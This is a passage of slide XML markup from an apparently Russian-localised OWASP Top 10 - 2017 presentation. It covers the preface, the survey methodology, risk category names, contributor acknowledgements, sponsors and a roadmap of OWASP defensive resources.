          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Details About Risk Factors</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3305248560"/>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ru-RU" sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ru-RU" sz="95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1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Industry Ranked Survey</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ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" b="1">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A3:2017-Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950" b="1">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A8:2017-Insecure Deserialization</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950" b="1">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A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950" b="1">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A10:2017-Insufficient Logging &amp; Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Public Data Call</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ru-RU" sz="95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sz="95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8"/>
                        </a:rPr>
                        <a:t>available in GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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sz="95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ru-RU" sz="3500"/>
              <a:t>+DAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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641151158"/>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ru-RU" sz="900" b="1" i="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</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b="1" i="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</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b="1" i="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</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1</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748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584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514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493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440</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sz="3500"/>
              <a:t>+ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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984864819"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Data Contributors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 many </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950" baseline="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r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="ru-RU">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ru-RU" sz="950" u="none" baseline="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ru-RU" sz="950" u="none" baseline="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ru-RU" sz="950" u="none" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Individual Contributors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ru-RU" sz="950" u="none" baseline="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We would be remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance. Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>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alonergan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ameft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anantshri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bandrzej</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bchurchill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binarious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bkimminich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Boberski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borischen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chrish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clerkendweller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davewichers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drkknight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drwetter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ecbftw</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einsweniger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ekobrin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eoftedal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frohoff</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fzipi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gebl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gilzow</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grnd</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hiralph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HoLyVieR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ilatypov</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irbishop</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itscooper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ivanr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jeremylong</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jhaddix</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jmanico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joaomatosf</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jrmithdobbs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jsteven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jvehent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katyanton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kerberosmansour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koto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mwcoates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nickthetait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ninedter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ossie-git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PauloASilva</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PeterMosmans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pontocom</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psiinon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pwntester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raesene</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riramar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ruroot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securitybits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sreenathsasikumar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stefanb</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sumitagarwalusa</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taprootsec</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tghosth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TheJambo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toddgrotenhuis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troymarshall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tsohlacol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vdbaan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yohgaki</a:t>
            </a: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ANCAP</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AsTech Consulting</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BUGemot</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Colegio LaSalle Monteria</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ContextIS</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Easybss</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Edgescan</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Hamed</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iBLISS Seguran̤a &amp; Intelig̻encia</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ITsec Security Services bv</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Khallagh</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M. Limacher IT Dienstleistungen</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Osampa</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Paladion Networks</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Purpletalk</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Softtek</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ru-RU" sz="95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2194677076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="82834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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Предисловие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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" i="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which is suitable for CIOs and CISOs, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Application Managers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity Model</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Спонсоры проекта</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a:r>
                      <a:b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ru-RU" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Благодарим компанию </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за спонсорскую поддержку Топ-10 </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OWASP - 2017.</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950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Организации и физические лица, предоставившие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П</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Предисловие</a:t>
            </a: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3749990698"/>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ru-RU" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Two key differentiators from previous OWASP Top 10 releases are the substantial community feedback and extensive data assembled from dozens of organizations, possibly the largest amount of data ever assembled in the preparation of an application security standard. This provides us with confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing organizations.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> completed by over 500 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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9621535"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Roadmap for future activities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sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Application Managers </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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950" b="1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP Proactive Controls </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> is a guide for organizations and application reviewers on what to verify.</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950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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advanced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Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin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757383712"/>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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
